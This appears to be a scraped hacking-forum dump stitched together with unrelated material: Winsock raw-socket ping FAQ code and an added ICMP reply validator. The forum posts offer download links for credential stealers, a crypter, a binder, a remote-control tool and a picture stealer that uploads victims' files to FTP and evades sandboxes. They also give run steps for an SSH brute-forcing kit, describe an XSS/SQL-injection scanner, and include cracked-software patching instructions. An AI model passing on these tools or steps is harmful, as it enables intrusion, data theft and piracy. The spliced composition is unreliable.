URL Dumper is an online scanner written by flash in VB.NET in the last year. Used to get XSS and SQL injection vulns. Supports multiple search engines, trash system, SQLite db to organize, etc.

Features:
-Get all page links by advanced technique with regular expression;
-XSS Scanner (auto check all page links);
-SQLInjection Scanner (auto check all page links);
-Multi-Thread engine;
-Get many links by search (google/Yahoo/Live Search/Altavista/Terravista)
-Search in the page source by regular expression;
-View Source (Code/Browser);
-Trash system
-Database in SQLite to organize the URL’s
-Enabled Proxy server
-Etc..

Binary: http://rapidshare.com/files/182933272/URL_Dumper_2.0_BIN.rar
Source code: http://rapidshare.com/files/182933656/URL_Dumper_2.0_SRC.rar
-
I like the questions, but I don't like the design.
-
Download: http://www.2shared.com/file/7066278/67a614e/SceneCoderz_Public_Stealer.html
-
How many more topics do you plan to revive?
-
Nowadays, there are far more threats out there than plain viruses. You have probably come across the term spyware as well, however, authors of malicious codes and dangerous websites are very innovative, and new kinds of threats emerge quite often, the vast majority of which are on the Internet. Here are some of the most common: · Exploit is a malicious code that takes advantage of a flaw or vulnerability in an operating system, Internet browser, or other essential program. · Social engineering is a common term for various techniques used to trick people into giving away their personal information (passwords, bank account details, credit card numbers etc.). A typical example of social engineering is phishing – an attempt to acquire sensitive personal data by shamming a trustworthy and well-known organization. Usually, the potential victims are contacted by a bulk e-mail asking them to e.g. update their bank account details. In order to do that, they are invited to follow the link provided which then leads to a fake website of the bank. · Scam can be also considered a kind of social engineering; it includes false job offers, or ones that will abuse the workers for illegal activities, summons to withdraw a large sum of money, fraudulent lotteries and the like. · Hoax is a bulk e-mail containing dangerous, alarming or just bothering and useless information. Many of the above threats use hoax e-mail messages to spread. Finally, malicious websites are ones that deliberately install malicious software on your computer, and hacked sites do just the same, only these are legitimate websites that have been compromised into infecting visitors. AVG LinkScanner is here to protect you from all these online threats. AVG LinkScanner is up and running immediately from the moment of installation. 
All basic settings have been pre-set by the manufacturer, so most of the time you will not have to worry about anything – just let AVG work in the background and protect you without any effort on your part. However, there might be situations where you need to adjust the program settings, or decide what to do with a virus infected file; this help system is here to provide detailed information and assist you with any task. Get AVG LinkScanner and enhance your online protection! Here are some key features of "AVG LinkScanner": · Search-Shield scans search results and places a safety rating next to each link, so you know where it’s safe to click. · Active Surf-Shield scans the page behind any link you click on or any web address you type into your browser. If the page is poisoned, it stops you from opening it. Reasons why this program is marked as adware: · Offers to install AVG Security Toolbar that the program does not require to fully function. Download: http://rapidshare.com/files/264761321/AVG-Linkscanner-8.5_337.rar
-
Please note this is 32 bit only! - m00n

Built on the award-winning ThreatSense® engine, ESET NOD32 Antivirus software proactively detects and eliminates more viruses, trojans, worms, adware, spyware, phishing, rootkits and other Internet threats than any program available. It's the ideal antivirus for Windows XP, and also runs smoothly on Windows legacy systems, MS-DOS, file servers, mail servers, and more. No matter what your system, there is no better antivirus protection. ESET NOD32 Antivirus was awarded the "BEST Antivirus Solution" in 2006 and 2007 by AV-Comparatives. Compare antivirus solutions here to learn more, or check out the latest virus bulletin.

ESET NOD32 Antivirus provides:
* Proactive Protection: The award winning ThreatSense technology combines multiple layers of detection protecting you from Internet threats before it is too late.
* Precise Detection: ESET accurately identifies known and unknown threats. It consistently wins top awards from testing labs and is recognized for having zero false positives.
* Lightweight Design: Requires less memory and CPU power, allowing your computer to run fast, making more room for games, web browsing, and emailing.
* Fast Scanning Speeds: Highly efficient program ensuring fast file scanning and product updates. It runs quietly in the background.

18.11 MB
Download: http://www.mediafire.com/?vzoyyzh4wzc
-
HIDE YOUR IP ADDRESS V1.0

Did you know your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Hide My IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button.

Key Benefits & Features

Easily Conceal Your IP Address - Just click "Hide IP" and your IP is instantly hidden! Other people see a fake IP, which is not associated with your real IP. Click here to read how it works.

Hide My IP 2009 Released January ??, 2009. Now with Secure 128-Bit Encrypted Connection, many new features, and more IPs!

Anonymous Web Surfing - Protect your privacy and cover your tracks! Select from one of our many fake proxy IP addresses for totally anonymous browsing.

Advanced Application Support - Hide My IP 2009 works with all major browsers and dozens of instant messengers, E-mail clients, games, and more!

Protect Your Identity and Stop Hackers - Identity thieves can use your IP addresses to compromise your computer, installing keyloggers, Trojans, and other tools to aid their crime. Stop them at the source by hiding your IP!

Send Anonymous Emails - Hide your IP in E-mail headers. Supports Webmail services like Yahoo, Hotmail, and GMail. Mail clients supported with a Premium account include Outlook, Outlook Express, Eudora, and more!

Un-ban Your IP From Forums, Blogs, and other Websites - By faking your IP you can often access many sites you were banned from. Use with Cookie Crumble for the most effectiveness.

Instructions On How To Patch The Program:

1. Copy and paste the patch included in this download into the installation directory you installed the program in. The default location to find the directory is: C:\Program Files\Hide Your IP Address
2. Open the Patch and make sure 'Make Backup' is ticked. Click "patch" when ready.
3. Delete the patch from the directory once you have patched the program.
4. Open Hide Your IP Address and a box will come up; make sure you click Register.
5. Type in anything you want for Name, E-Mail and Serial Key boxes. Click register then OK.
6. Restart Hide Your IP Address and you'll see it's activated!

What's Inside?

Download: http://rapidshare.com/files/262261498/HideYourIP_v1.0_Admiral.rar
-
Registry RegDefense 2009 restores your computer to run like new. RegDefense prevents PC slowdowns and crashes by cleaning up registry files and errors. It also repairs DLLs and general system slowdowns that cause computer frustrations. RegDefense scans your computer and finds the problems with your computer and then fixes them so your computer runs like it did when you first took it out of the box.

Features:
• Registry Optimizer
• Startup Manager
• Backup / Restore Tools
• Automatic Scheduler
• 32 & 64 Bit Compatible
• Tweak System Manager
• In-Depth Scan
• Fix Invalid File Paths
• Fix Invalid Shortcuts
• Fix Empty Registry Keys
• Fix Invalid Class Keys
• Fix Invalid Font Files
• Fix User Settings
• Increases Performance
• Increases Computer Speed
• Increases Disk Space
• Increases Computer Life
• Manage Shared Dll's
• Customize Settings
• Scan Result Manager
• Automatic Updates
• Automatic or Manual Fix
• Visual Scan Process
• Validate Startup Programs
• Validate Active-X Objects
• Prevent PC Freezing
• Prevent System Crashes
• Registry Defrag

System Requirements

Minimum system requirements: 128 MB RAM, 10 MB Hard drive space

Supported operating system: Microsoft Windows Vista, Microsoft Windows XP, Microsoft Windows 2000

Download: http://rapidshare.com/files/263635390/Registry_Defense_v4.1.0.6_MUFIDIM_UPLOAD.rar
-
Tutorials... 1 : [+] Download 2 : [+] tar -zxvf [+]SSH Brutforcing.. by Max`s.tar 3 : [+] cd [+]SSH Brutforcing.. by Max`s 4 : [+] chmod +x * 5 : [+] ./scan ip.ip (ex ./scan 62.175) 6 : [+] Enjoy.... Programs use on Linux Download: hxxp://rapidshare.com/files/265000094/___SSH_Brutforcing.._by_Max_s.tar.html
-
Changes: New Design Icon Changer Anti VMWare Download: http://rapidshare.com/files/265002051/uNkCrypter_1.4.zip.html
-
Download: http://rapidshare.com/files/265012450/DelphBinder_Pro.rar.html
-
Download: http://www.2shared.com/file/7062953/20a9a2f2/StupidStealer.html
-
This steals pictures from your customers computer Beaver's Pic Hunter Version 1.5 Here Is What It Looks Like On The FTP Features: FTP Upload All Picture Files Containing The Selected Extensions On The Selected Drive Anti-Wireshark Anti-Anubis Anti-Zone Alarm Anti-Sandbox Copy Itself To C:\ And Add To Starup Registry Disable Task Manager Add A Custom Extension To Search For Download: http://www.2shared.com/file/7062928/f83aedbd/Beavers_Pic_Hunter_15.html
-
Download: http://www.2shared.com/file/7062897/8ab343d0/Redix_-_PoPCoRn.html
-
Changelog 1.0 Added EULA Removed Plugin Popup Added No-Ip Auto Updater Added DynDns Auto Updater Fixed RAM Display Bug Now Saves your Window State on close of Cerberus Fixed Visible Mode from not properly closing out process Removed LAN Ip from display Removed HWID from Client Name Removed Buggy SMTP Keylogger Send and MSN tab in Extra Options Now Displays if system is 32bit or 64bit Identifies system as Windows 7 Some other small server stability fix's Download: http://www.2shared.com/file/7062888/3176f00/Cerberus.html
-
"Your Security Get Down !! No Thing To Say , Only Be Have More Security !!" How I hate these trashy texts. @d3v1l: Why should it be time for it to happen?
-
Winsock Programmer's FAQ
Examples: Ping: Raw Sockets Method

This pinger uses "raw sockets", so it requires Winsock 2. It's about 3 times longer (288 non-comment lines versus 98) than the ICMP method, but it will continue to work, while the ICMP method might fail to work on future versions of Windows. This program is also much more flexible than the ICMP.DLL pinger.

To use this program on Windows NT derivatives, you must be logged in as an Administrator.

This program is split into two major parts: a driver part and a "pinger" part. The driver mainly just declares main(), which calls the functions in the pinger part in the proper sequence. The pinger part is mostly reusable as-is, although you will probably want to do things like exchanging the output statements for encoded return values. There is also a separate module for the IP checksum calculation function because it is not specifically tied to pinging; this same algorithm is used in other parts of TCP/IP.

This program allows you to change the ICMP packet's TTL (time to live) value. From this, you can do several other interesting things, like developing a traceroute utility, and finding the next hop (such as a router) on your network. Notice that we don't use the "ttl" field in struct IPHeader, because we can only receive the full IP header, not send it. Instead, we use the setsockopt() with the IP_TTL flag to set the TTL option in the IP header.

You might want to add timeout functionality to this program, so that it doesn't wait forever for a ping reply. Two ways to handle this are to 1) spin the ping off into a separate thread and handle the timeout from the main thread; or 2) drop in a call to select() before the recvfrom() call, passing something reasonable for the timeout argument.

This program is based on a program in the Win32 SDK, though hardly any of the original code remains. Also, this version is a bit smarter, compiles under both Microsoft and Borland C++, and should be much easier to understand and reuse.

rawping_driver.cpp

    /***********************************************************************
     rawping_driver.cpp - A driver program to test the rawping.cpp module.

     Building under Microsoft C++ 5.0:

        cl -GX rawping.cpp rawping_driver.cpp ip_checksum.cpp ws2_32.lib

     Building under Borland C++ 5.0:

        bcc32 rawping.cpp rawping_driver.cpp ip_checksum.cpp ws2_32.lib

     ----------------------------------------------------------------------
     Change log:
        9/21/1998 - Added TTL support.

        2/14/1998 - Polished the program up and separated out the
            rawping.cpp and ip_checksum.cpp modules.  Also got it to work
            under Borland C++.

        2/12/1998 - Fixed a problem with the checksum calculation.  Program
            works now.

        2/6/1998 - Created using Microsoft's "raw ping" sample in the Win32
            SDK as a model.  Not much remains of the original code.
    ***********************************************************************/

    #include <winsock2.h>
    #include <iostream.h>

    #include "rawping.h"

    #define DEFAULT_PACKET_SIZE 32
    #define DEFAULT_TTL 30
    #define MAX_PING_DATA_SIZE 1024
    #define MAX_PING_PACKET_SIZE (MAX_PING_DATA_SIZE + sizeof(IPHeader))

    int allocate_buffers(ICMPHeader*& send_buf, IPHeader*& recv_buf,
            int packet_size);


    ///////////////////////////////////////////////////////////////////////
    // Program entry point

    int main(int argc, char* argv[])
    {
        // Init some variables at top, so they aren't skipped by the
        // cleanup routines.
        int seq_no = 0;
        ICMPHeader* send_buf = 0;
        IPHeader* recv_buf = 0;

        // Did user pass enough parameters?
        if (argc < 2) {
            cerr << "usage: " << argv[0] << " <host> [data_size] [ttl]" <<
                    endl;
            cerr << "\tdata_size can be up to " << MAX_PING_DATA_SIZE <<
                    " bytes.  Default is " << DEFAULT_PACKET_SIZE << "." <<
                    endl;
            cerr << "\tttl should be 255 or lower.  Default is " <<
                    DEFAULT_TTL << "." << endl;
            return 1;
        }

        // Figure out how big to make the ping packet
        int packet_size = DEFAULT_PACKET_SIZE;
        int ttl = DEFAULT_TTL;
        if (argc > 2) {
            int temp = atoi(argv[2]);
            if (temp != 0) {
                packet_size = temp;
            }
            if (argc > 3) {
                temp = atoi(argv[3]);
                if ((temp >= 0) && (temp <= 255)) {
                    ttl = temp;
                }
            }
        }
        packet_size = max(sizeof(ICMPHeader),
                min(MAX_PING_DATA_SIZE, (unsigned int)packet_size));

        // Start Winsock up
        WSAData wsaData;
        if (WSAStartup(MAKEWORD(2, 1), &wsaData) != 0) {
            cerr << "Failed to find Winsock 2.1 or better." << endl;
            return 1;
        }

        // Set up for pinging
        SOCKET sd;
        sockaddr_in dest, source;
        if (setup_for_ping(argv[1], ttl, sd, dest) < 0) {
            goto cleanup;
        }
        if (allocate_buffers(send_buf, recv_buf, packet_size) < 0) {
            goto cleanup;
        }
        init_ping_packet(send_buf, packet_size, seq_no);

        // Send the ping and receive the reply
        if (send_ping(sd, dest, send_buf, packet_size) >= 0) {
            while (1) {
                // Receive replies until we either get a successful read,
                // or a fatal error occurs.
                if (recv_ping(sd, source, recv_buf, MAX_PING_PACKET_SIZE) <
                        0) {
                    // Pull the sequence number out of the ICMP header.  If
                    // it's bad, we just complain, but otherwise we take
                    // off, because the read failed for some reason.
                    unsigned short header_len = recv_buf->h_len * 4;
                    ICMPHeader* icmphdr = (ICMPHeader*)
                            ((char*)recv_buf + header_len);
                    if (icmphdr->seq != seq_no) {
                        cerr << "bad sequence number!" << endl;
                        continue;
                    }
                    else {
                        break;
                    }
                }
                if (decode_reply(recv_buf, packet_size, &source) != -2) {
                    // Success or fatal error (as opposed to a minor error)
                    // so take off.
                    break;
                }
            }
        }

    cleanup:
        delete[]send_buf;
        delete[]recv_buf;
        WSACleanup();
        return 0;
    }


    /////////////////////////// allocate_buffers ///////////////////////////
    // Allocates send and receive buffers.  Returns < 0 for failure.

    int allocate_buffers(ICMPHeader*& send_buf, IPHeader*& recv_buf,
            int packet_size)
    {
        // First the send buffer
        send_buf = (ICMPHeader*)new char[packet_size];
        if (send_buf == 0) {
            cerr << "Failed to allocate output buffer." << endl;
            return -1;
        }

        // And then the receive buffer
        recv_buf = (IPHeader*)new char[MAX_PING_PACKET_SIZE];
        if (recv_buf == 0) {
            cerr << "Failed to allocate output buffer." << endl;
            return -1;
        }

        return 0;
    }

rawping.cpp

    /***********************************************************************
     rawping.cpp - Contains all of the functions essential to sending "ping"
        packets using Winsock 2 raw sockets.  Depends on ip_checksum.cpp for
        calculating IP-style checksums on blocks of data, however.
    ***********************************************************************/

    #include <winsock2.h>
    #include <ws2tcpip.h>
    #include <iostream.h>

    #include "rawping.h"
    #include "ip_checksum.h"


    //////////////////////////// setup_for_ping ////////////////////////////
    // Creates the Winsock structures necessary for sending and receiving
    // ping packets.  host can be either a dotted-quad IP address, or a
    // host name.  ttl is the time to live (a.k.a. number of hops) for the
    // packet.  The other two parameters are outputs from the function.
    // Returns < 0 for failure.

    int setup_for_ping(char* host, int ttl, SOCKET& sd, sockaddr_in& dest)
    {
        // Create the socket
        sd = WSASocket(AF_INET, SOCK_RAW, IPPROTO_ICMP, 0, 0, 0);
        if (sd == INVALID_SOCKET) {
            cerr << "Failed to create raw socket: " << WSAGetLastError() <<
                    endl;
            return -1;
        }

        if (setsockopt(sd, IPPROTO_IP, IP_TTL, (const char*)&ttl,
                sizeof(ttl)) == SOCKET_ERROR) {
            cerr << "TTL setsockopt failed: " << WSAGetLastError() << endl;
            return -1;
        }

        // Initialize the destination host info block
        memset(&dest, 0, sizeof(dest));

        // Turn first passed parameter into an IP address to ping
        unsigned int addr = inet_addr(host);
        if (addr != INADDR_NONE) {
            // It was a dotted quad number, so save result
            dest.sin_addr.s_addr = addr;
            dest.sin_family = AF_INET;
        }
        else {
            // Not in dotted quad form, so try and look it up
            hostent* hp = gethostbyname(host);
            if (hp != 0) {
                // Found an address for that host, so save it
                memcpy(&(dest.sin_addr), hp->h_addr, hp->h_length);
                dest.sin_family = hp->h_addrtype;
            }
            else {
                // Not a recognized hostname either!
                cerr << "Failed to resolve " << host << endl;
                return -1;
            }
        }

        return 0;
    }


    /////////////////////////// init_ping_packet ///////////////////////////
    // Fill in the fields and data area of an ICMP packet, making it
    // packet_size bytes by padding it with a byte pattern, and giving it
    // the given sequence number.  That completes the packet, so we also
    // calculate the checksum for the packet and place it in the appropriate
    // field.

    void init_ping_packet(ICMPHeader* icmp_hdr, int packet_size, int seq_no)
    {
        // Set up the packet's fields
        icmp_hdr->type = ICMP_ECHO_REQUEST;
        icmp_hdr->code = 0;
        icmp_hdr->checksum = 0;
        icmp_hdr->id = (USHORT)GetCurrentProcessId();
        icmp_hdr->seq = seq_no;
        icmp_hdr->timestamp = GetTickCount();

        // "You're dead meat now, packet!"
        const unsigned long int deadmeat = 0xDEADBEEF;
        char* datapart = (char*)icmp_hdr + sizeof(ICMPHeader);
        int bytes_left = packet_size - sizeof(ICMPHeader);
        while (bytes_left > 0) {
            memcpy(datapart, &deadmeat, min(int(sizeof(deadmeat)),
                    bytes_left));
            bytes_left -= sizeof(deadmeat);
            datapart += sizeof(deadmeat);
        }

        // Calculate a checksum on the result
        icmp_hdr->checksum = ip_checksum((USHORT*)icmp_hdr, packet_size);
    }


    /////////////////////////////// send_ping //////////////////////////////
    // Send an ICMP echo ("ping") packet to host dest by way of sd with
    // packet_size bytes.  packet_size is the total size of the ping packet
    // to send, including the ICMP header and the payload area; it is not
    // checked for sanity, so make sure that it's at least
    // sizeof(ICMPHeader) bytes, and that send_buf points to at least
    // packet_size bytes.  Returns < 0 for failure.

    int send_ping(SOCKET sd, const sockaddr_in& dest, ICMPHeader* send_buf,
            int packet_size)
    {
        // Send the ping packet in send_buf as-is
        cout << "Sending " << packet_size << " bytes to " <<
                inet_ntoa(dest.sin_addr) << "..." << flush;
        int bwrote = sendto(sd, (char*)send_buf, packet_size, 0,
                (sockaddr*)&dest, sizeof(dest));
        if (bwrote == SOCKET_ERROR) {
            cerr << "send failed: " << WSAGetLastError() << endl;
            return -1;
        }
        else if (bwrote < packet_size) {
            cout << "sent " << bwrote << " bytes..." << flush;
        }

        return 0;
    }


    /////////////////////////////// recv_ping //////////////////////////////
    // Receive a ping reply on sd into recv_buf, and stores address info
    // for sender in source.  On failure, returns < 0, 0 otherwise.
    // packet_size is the full size of recv_buf in bytes.
    //
    // Note that recv_buf must be larger than send_buf (passed to send_ping)
    // because the incoming packet has the IP header attached.  It can also
    // have IP options set, so it is not sufficient to make it
    // sizeof(send_buf) + sizeof(IPHeader).  We suggest just making it
    // fairly large and not worrying about wasting space.

    int recv_ping(SOCKET sd, sockaddr_in& source, IPHeader* recv_buf,
            int packet_size)
    {
        // Wait for the ping reply.  The length given to recvfrom() is
        // packet_size unchanged: the caller already passes the whole buffer
        // size (MAX_PING_PACKET_SIZE), so adding sizeof(IPHeader) here
        // would let a large reply be written past the end of recv_buf.
        int fromlen = sizeof(source);
        int bread = recvfrom(sd, (char*)recv_buf, packet_size, 0,
                (sockaddr*)&source, &fromlen);
        if (bread == SOCKET_ERROR) {
            cerr << "read failed: ";
            if (WSAGetLastError() == WSAEMSGSIZE) {
                cerr << "buffer too small" << endl;
            }
            else {
                cerr << "error #" << WSAGetLastError() << endl;
            }
            return -1;
        }

        return 0;
    }


    ///////////////////////////// decode_reply /////////////////////////////
    // Decode and output details about an ICMP reply packet.  Returns -1
    // on failure, -2 on "try again" and 0 on success.

    int decode_reply(IPHeader* reply, int bytes, sockaddr_in* from)
    {
        // Skip ahead to the ICMP header within the IP packet
        unsigned short header_len = reply->h_len * 4;
        ICMPHeader* icmphdr = (ICMPHeader*)((char*)reply + header_len);

        // Make sure the reply is sane
        if (bytes < header_len + ICMP_MIN) {
            cerr << "too few bytes from " << inet_ntoa(from->sin_addr) <<
                    endl;
            return -1;
        }
        else if (icmphdr->type != ICMP_ECHO_REPLY) {
            if (icmphdr->type != ICMP_TTL_EXPIRE) {
                if (icmphdr->type == ICMP_DEST_UNREACH) {
                    cerr << "Destination unreachable" << endl;
                }
                else {
                    cerr << "Unknown ICMP packet type " <<
                            int(icmphdr->type) << " received" << endl;
                }
                return -1;
            }
            // If "TTL expired", fall through.  Next test will fail if we
            // try it, so we need a way past it.
        }
        else if (icmphdr->id != (USHORT)GetCurrentProcessId()) {
            // Must be a reply for another pinger running locally, so just
            // ignore it.
            return -2;
        }

        // Figure out how far the packet travelled
        int nHops = int(256 - reply->ttl);
        if (nHops == 192) {
            // TTL came back 64, so ping was probably to a host on the
            // LAN -- call it a single hop.
            nHops = 1;
        }
        else if (nHops == 128) {
            // Probably localhost
            nHops = 0;
        }

        // Okay, we ran the gamut, so the packet must be legal -- dump it
        cout << endl << bytes << " bytes from " <<
                inet_ntoa(from->sin_addr) << ", icmp_seq " <<
                icmphdr->seq << ", ";
        if (icmphdr->type == ICMP_TTL_EXPIRE) {
            cout << "TTL expired." << endl;
        }
        else {
            cout << nHops << " hop" << (nHops == 1 ? "" : "s");
            cout << ", time: " << (GetTickCount() - icmphdr->timestamp) <<
                    " ms." << endl;
        }

        return 0;
    }

rawping.h

    /***********************************************************************
     rawping.h - Declares the types, constants and prototypes required to
        use the rawping.cpp module.
    ***********************************************************************/

    #define WIN32_LEAN_AND_MEAN
    #include <winsock2.h>

    // ICMP packet types
    #define ICMP_ECHO_REPLY 0
    #define ICMP_DEST_UNREACH 3
    #define ICMP_TTL_EXPIRE 11
    #define ICMP_ECHO_REQUEST 8

    // Minimum ICMP packet size, in bytes
    #define ICMP_MIN 8

    #ifdef _MSC_VER
    // The following two structures need to be packed tightly, but unlike
    // Borland C++, Microsoft C++ does not do this by default.
    #pragma pack(1)
    #endif

    // The IP header
    struct IPHeader {
        BYTE h_len:4;           // Length of the header in dwords
        BYTE version:4;         // Version of IP
        BYTE tos;               // Type of service
        USHORT total_len;       // Length of the packet in bytes
        USHORT ident;           // unique identifier
        USHORT flags;           // Flags
        BYTE ttl;               // Time to live
        BYTE proto;             // Protocol number (TCP, UDP etc)
        USHORT checksum;        // IP checksum
        ULONG source_ip;
        ULONG dest_ip;
    };

    // ICMP header
    struct ICMPHeader {
        BYTE type;          // ICMP packet type
        BYTE code;          // Type sub code
        USHORT checksum;
        USHORT id;
        USHORT seq;
        ULONG timestamp;    // not part of ICMP, but we need it
    };

    #ifdef _MSC_VER
    #pragma pack()
    #endif

    extern int setup_for_ping(char* host, int ttl, SOCKET& sd,
            sockaddr_in& dest);
    extern int send_ping(SOCKET sd, const sockaddr_in& dest,
            ICMPHeader* send_buf, int packet_size);
    extern int recv_ping(SOCKET sd, sockaddr_in& source, IPHeader* recv_buf,
            int packet_size);
    extern int decode_reply(IPHeader* reply, int bytes, sockaddr_in* from);
    extern void init_ping_packet(ICMPHeader* icmp_hdr, int packet_size,
            int seq_no);

ip_checksum.cpp

    /***********************************************************************
     ip_checksum.cpp - Calculates IP-style checksums on a block of data.
    ***********************************************************************/

    #define WIN32_LEAN_AND_MEAN
    #include <windows.h>

    USHORT ip_checksum(USHORT* buffer, int size)
    {
        unsigned long cksum = 0;

        // Sum all the words together, adding the final byte if size is odd
        while (size > 1) {
            cksum += *buffer++;
            size -= sizeof(USHORT);
        }
        if (size) {
            cksum += *(UCHAR*)buffer;
        }

        // Do a little shuffling
        cksum = (cksum >> 16) + (cksum & 0xffff);
        cksum += (cksum >> 16);

        // Return the bitwise complement of the resulting mishmash
        return (USHORT)(~cksum);
    }

ip_checksum.h

    extern USHORT ip_checksum(USHORT* buffer, int size);

Footnotes

1. The traceroute utility ("tracert.exe") works by setting the TTL field to 1, sending a ping, waiting for the reply, setting TTL to 2...and so on. By looking at the addresses returned in the ICMP_TTL_EXPIRE replies, you can "trace" a route through the Internet. Eventually, you'll get an ICMP_ECHO reply, which lets you know when you've completed the route to the host. (Incidentally, many Unix traceroute utilities use UDP instead of ICMP, which if nothing else doesn't require that you use raw sockets.)

2. Finding the next hop on the network can be useful, because it allows you to discover a gateway to another network, such as the Internet. To do this, set the TTL field to 1, send the ping and see who responds with ICMP_TTL_EXPIRE. This isn't reliable, but it can be useful in some situations.
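The reply check in decode_reply() above takes the IP header length from the packet itself and compares it with the size that was sent, not the size that arrived. The following is an added example, not part of the FAQ's code: a portable validator that checks every packet-supplied length against the byte count recvfrom() returned, run here against constructed buffers so no raw socket is needed. All type and function names are this example's own, and it assumes id and seq travel in network byte order.

```cpp
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Names are this example's own (assumptions), not taken from rawping.h.
enum ReplyStatus { REPLY_OK, REPLY_TRUNCATED, REPLY_BAD_IP_HEADER,
                   REPLY_NOT_ICMP, REPLY_BAD_CHECKSUM, REPLY_NOT_ECHO_REPLY,
                   REPLY_NOT_OURS };
struct EchoReply { uint16_t id, seq; uint8_t ttl; size_t payload_len; };
const size_t IP_MIN_HEADER = 20, ICMP_MIN_LEN = 8;

// Same one's-complement sum as ip_checksum.cpp, read bytewise so odd lengths
// and unaligned buffers are safe. A message with a valid checksum yields 0.
uint16_t inet_checksum(const uint8_t* p, size_t n) {
    uint32_t sum = 0;
    for (; n > 1; p += 2, n -= 2) sum += (uint32_t)((p[0] << 8) | p[1]);
    if (n) sum += (uint32_t)p[0] << 8;
    while (sum >> 16) sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

// Validate a datagram of `received` bytes (the recvfrom() return value).
// Each length taken from the packet is checked against `received` before
// any field located behind it is read.
ReplyStatus parse_echo_reply(const uint8_t* buf, size_t received,
                             uint16_t expect_id, EchoReply* out) {
    if (received < IP_MIN_HEADER) return REPLY_TRUNCATED;
    if ((buf[0] >> 4) != 4) return REPLY_BAD_IP_HEADER;
    size_t ihl = (size_t)(buf[0] & 0x0f) * 4;        // sender-controlled
    if (ihl < IP_MIN_HEADER) return REPLY_BAD_IP_HEADER;
    if (received < ihl + ICMP_MIN_LEN) return REPLY_TRUNCATED;
    if (buf[9] != 1) return REPLY_NOT_ICMP;          // protocol 1 = ICMP
    const uint8_t* icmp = buf + ihl;
    if (inet_checksum(icmp, received - ihl) != 0) return REPLY_BAD_CHECKSUM;
    if (icmp[0] != 0 || icmp[1] != 0) return REPLY_NOT_ECHO_REPLY;
    uint16_t id = (uint16_t)((icmp[4] << 8) | icmp[5]);
    if (id != expect_id) return REPLY_NOT_OURS;      // another local pinger
    out->id = id;
    out->seq = (uint16_t)((icmp[6] << 8) | icmp[7]);
    out->ttl = buf[8];
    out->payload_len = received - ihl - ICMP_MIN_LEN;
    return REPLY_OK;
}

// Constructed sample data: builds an echo reply with `ihl_words` 32-bit words
// of IP header (5 = no options). Returns its length, or 0 if it will not fit.
size_t build_sample_reply(uint8_t* buf, size_t cap, unsigned ihl_words,
                          uint16_t id, uint16_t seq, size_t payload_len) {
    size_t ihl = (size_t)ihl_words * 4;
    size_t total = ihl + ICMP_MIN_LEN + payload_len;
    if (ihl_words < 5 || ihl_words > 15 || total > cap) return 0;
    memset(buf, 0, total);
    buf[0] = (uint8_t)(0x40 | ihl_words);            // version 4 + IHL
    buf[2] = (uint8_t)(total >> 8); buf[3] = (uint8_t)total;
    buf[8] = 128; buf[9] = 1;                        // TTL, protocol
    uint8_t* icmp = buf + ihl;                       // type 0, code 0
    icmp[4] = (uint8_t)(id >> 8);  icmp[5] = (uint8_t)id;
    icmp[6] = (uint8_t)(seq >> 8); icmp[7] = (uint8_t)seq;
    memset(icmp + ICMP_MIN_LEN, 0xAB, payload_len);
    uint16_t ck = inet_checksum(icmp, total - ihl);
    icmp[2] = (uint8_t)(ck >> 8); icmp[3] = (uint8_t)ck;
    return total;
}
```

A header-length field larger than the datagram is reported as REPLY_TRUNCATED instead of being used as an offset, and the checksum is verified over the bytes actually received.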